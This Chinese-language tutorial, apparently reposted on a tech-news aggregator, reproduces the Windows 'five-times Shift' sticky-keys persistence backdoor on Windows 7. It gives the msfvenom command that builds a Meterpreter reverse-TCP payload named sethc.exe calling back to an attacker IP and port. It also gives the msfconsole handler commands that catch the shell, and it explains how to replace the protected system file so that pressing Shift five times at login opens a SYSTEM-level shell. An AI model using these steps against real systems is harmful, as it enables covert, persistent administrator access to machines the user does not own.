Windows系统利用5次shift维权漏洞复现

编程知识 更新时间:2023-04-15 07:16:01

操作系统: Windows 7 旗舰版

工具: kali系统的msfconsole

5次shift维权原理

Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\System32\sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限

除此以外,还可以使用其他工具替换sethc.exe

第一步,使用kali的msfconsole生成木马工具

1.开启MSF

msfconsole

 2.使用开发模块

use exploit/multi/handler

 3.生成木马,lhost写自己的ip,lport写自己的端口,作用是反弹shell到指定ip的端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=4444 -f exe -o sethc.exe

4.因为我是在桌面打开的终端,生成的木马文件会在用户的根目录下,打开另一个终端查看文件位置

 

第二步,监听端口,接收反弹的shell

1.生成payload

set payload windows/meterpreter/reverse_tcp

2.设置反弹shell的位置( 自己的ip )

set lhost 192.168.18.128

3.设置反弹的端口

set lport 4444

4.开启监听

exploit

 

第三步,替换sethc.exe

将生成的木马工具上传到目标主机的c:/windows/system32目录下,并替换原有的sethc.exe

源sethc.exe不能直接修改或删除,需要修改权限

 

第四步,5次shift触发sethc.exe并反弹shell

1.在目标主机按5次shift触发sethc.exe,没有任何反应,因为程序被替换了

2.查看kali的监听状态,输入 shell 可进入目标主机的命令行,并执行系统命令

 

 

更多推荐

Windows系统利用5次shift维权漏洞复现

本文发布于:2023-04-12 12:07:00,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/59230ddda548e248f2b3cda230bcef60.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:漏洞   系统   Windows   shift

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

  • 70294文章数
  • 14阅读数
  • 0评论数